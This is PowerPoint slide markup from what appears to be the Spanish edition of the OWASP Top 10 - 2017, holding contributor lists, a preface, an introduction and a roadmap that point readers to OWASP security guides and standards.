wcoates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neo00</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nickthetait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ninedter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ossie-git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PauloASilva</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PeterMosmans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pontocom</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psiinon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pwntester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raesene</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riramar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ruroot</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Securitybits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seguinfo</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SPoint42</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sreenathsasikumar</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stefanb</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sumitagarwalusa</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taprootsec</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tghosth</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TheJambo</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thesp0nge</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toddgrotenhuis</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troymarshall</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tsohlacol</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vdbaan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" fontAlgn="b">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yohgaki</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="3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712641"/>
            <a:ext cx="6849278" cy="2655294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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AsTech Consulting</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Atos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Bugcrowd</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BUGemot</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CDAC</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Checkmarx</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Colegio LaSalle Monteria</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Company.com</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ContextIS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DDoS.com</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Easybss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Edgescan</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EVRY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EZI</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Hamed</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Hidden</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iBLISS Seguran̤a &amp; Intelig̻encia</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ITsec Security Services bv</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Khallagh</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Linden Lab</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M. Limacher IT Dienstleistungen</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Osampa</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Paladion Networks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Purpletalk</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SHCP</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Softtek</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Synopsis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TCS</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Veracode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:spcBef>
                <a:spcPts val="3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22864487"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6858000" cy="8804377"/>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27216">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Prefacio</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR"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46268">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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El software inseguro está debilitando las finanzas, salud, defensa, energía, y otras infraestructuras críticas. A medida que el software se convierte en algo crítico, complejo e interconectado, la dificultad de lograr seguridad en las aplicaciones aumenta exponencialmente. El ritmo vertiginoso de los procesos de desarrollo de software actuales, incrementa aún más el riesgo de no descubrir vulnerabilidades de forma rápida y precisa. Ya no podemos permitirnos tolerar problemas de seguridad relativamente simples como los presentados en este OWASP Top 10.</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Durante la creación del OWASP Top 10 - 2017 se recibieron una gran cantidad de opiniones, muchas más que cualquier otro proyecto de OWASP equivalente. Esto demostró la pasión que la comunidad posee por el OWASP Top 10, y lo crítico que es para OWASP obtener el Top 10 correcto para la mayoría de los casos de uso.</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Aunque el objetivo original del proyecto OWASP Top 10 fue simplemente concientizar a los desarrolladores y gerentes, se ha convertido en un standard de seguridad de facto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </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En la presente versión, los problemas y recomendaciones fueron escritos de manera concisa y verificable con el fin de favorecer la adopción del OWASP Top 10 en los programas de seguridad de aplicaciones. </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Alentamos a las grandes organizaciones a utilizar el </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Estándar de Verificación de Seguridad en Aplicaciones de OWASP (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, pero para la mayoría, el OWASP Top 10 es un gran comienzo en el camino de seguridad de aplicaciones.</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Hemos escrito una serie de sugerencias para los diferentes usuarios de este OWASP Top 10, incluyendo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Próximos pasos para los Desarrolladores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" i="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Próximos pasos para Testers de seguridad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" i="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Próximos pasos para las Organizaciones</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, lo cual es apropiado tanto para CIOs y CISOs, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Próximos pasos para los Administradores de aplicaciones</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, lo cual es aplicable por administradores o cualquier persona responsable del ciclo de vida de desarrollo del software.</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A largo plazo, alentamos a todos los equipos y organizaciones de desarrollo de software a crear un programa de seguridad de aplicaciones que sea compatible con su cultura y tecnología. Estos programas existen en todas las formas y tamaños. Aproveche las fortalezas existentes en su organización para medir y mejorar el programa de seguridad en sus aplicaciones, utilizando el </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Modelo de Madurez de Aseguramiento del Software</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>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Esperamos que el OWASP Top 10 sea útil para mejorar la seguridad en sus aplicaciones. No dude en ponerse en contacto con OWASP, dejando sus preguntas, comentarios e ideas en nuestro repositorio de proyectos GitHub:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1270">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Puede encontrar las traducciones del OWASP Top 10 aquí</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1270">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Por último, queremos agradecer a los líderes fundadores del OWASP Top 10, Dave Wichers y Jeff Williams, por todos sus esfuerzos y creer en nosotros para poder finalizar este proyecto con la ayuda de la comunidad. ¡Gracias!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew van der Stock</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a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian Glas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a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>e</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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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2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s-AR" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Atribuciones</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38322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Gracias a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50" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>por patrocinar el OWASP Top 10 - 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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s-AR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Las organizaciones e individuos que han proporcionado datos sobre prevalencia de las vulnerabilidades u otro tipo de asistencia, se enumeran en la página de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="1"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Agradecimientos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t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Acerca de OWASP</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011067566"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6858000" cy="896394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s-AR"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Bienvenidos</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 al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6509">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Esta importante actualización agrega varios puntos nuevos, incluyendo dos seleccionados por la comunidad – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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 Deserialización insegura</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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 Registro, Detección y Respuestas Activas Insuficientes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Dos diferenciadores clave sobre las versiones anteriores del OWASP Top 10 son las notables devoluciones de la comunidad y la gran cantidad de datos recopilados de docenas de organizaciones, siendo posiblemente la mayor cantidad de datos jamás reunidos en la preparación de un estándar de seguridad de aplicaciones. Esto nos da la confianza de que el nuevo OWASP Top 10 aborda los riesgos de seguridad de aplicaciones más impactantes que enfrentan las organizaciones en la actualidad</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El OWASP Top 10 - 2017 se basa principalmente en el envío de datos de más de 40 empresas que se especializan en seguridad de aplicaciones y una encuesta de la industria que fue completada por más de 500 personas. Esta información abarca vulnerabilidades recopiladas de cientos de organizaciones y más de 100.000 aplicaciones y APIs del mundo real. Las 10 principales categorías fueron seleccionadas y priorizadas de acuerdo con estos datos de prevalencia, en combinación con estimaciones consensuadas de explotabilidad, detectabilidad e impacto.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Uno de los principales objetivos del OWASP Top 10 es educar a los desarrolladores, diseñadores, arquitectos, gerentes y organizaciones sobre las consecuencias de las debilidades más comunes y más importantes de la seguridad de las aplicaciones web. El Top 10 proporciona técnicas básicas para protegerse contra estas áreas con problemas de riesgo alto, y proporciona orientación sobre cómo continuar desde allí</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin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14984056"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4097905"/>
          <a:ext cx="3352800" cy="579251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s-AR" sz="1350" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hoja de ruta para las futuras actividades</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="135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s-AR" sz="900" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No se detenga en el Top 10. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hay cientos de fallas que podrían afectar la seguridad general de una aplicación web, como se describe en la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Guía</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 de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Desarrolladores</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 de OWASP</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y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" noProof="0" dirty="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las </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>hojas</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7"/>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>trucos</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7"/>
                        </a:rPr>
                        <a:t> de OWASP</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Estas son lecturas esenciales para cualquier persona que desarrolle aplicaciones web y APIs. En la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Guía</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8"/>
                        </a:rPr>
                        <a:t> de Testing de OWASP</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encontrará orientación sobre cómo reconocer vulnerabilidades de forma efectiva en aplicaciones web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="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s-AR" sz="900" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cambio constante.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El OWASP Top 10 continuará cambiando. Aún sin cambiar una simple línea en el código fuente de su aplicación, podría volverse vulnerable a medida que se encuentren nuevas fallas y métodos de ataques. Para obtener más información, revise los consejos al final del Top 10 en Próximos pasos para</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00" b="0" i="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Desarrolladores</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" dirty="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Testers de seguridad</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" dirty="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Organizaciones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y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="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Administradores de aplicaciones</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s-AR" sz="900" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Piense positivo.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Cuando esté listo para dejar de perseguir vulnerabilidades y centrarse en establecer controles sólidos de seguridad de aplicaciones, el proyecto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Controles Proactivos de OWASP</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 proporciona un punto de partida para ayudar a los desarrolladores a incorporar la seguridad en sus aplicaciones y el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14"/>
                        </a:rPr>
                        <a:t>Estándar de Verificación de Seguridad en Aplicaciones de OWASP (ASVS)</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 es una guía para las organizaciones y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" i="1" baseline="0" dirty="0">
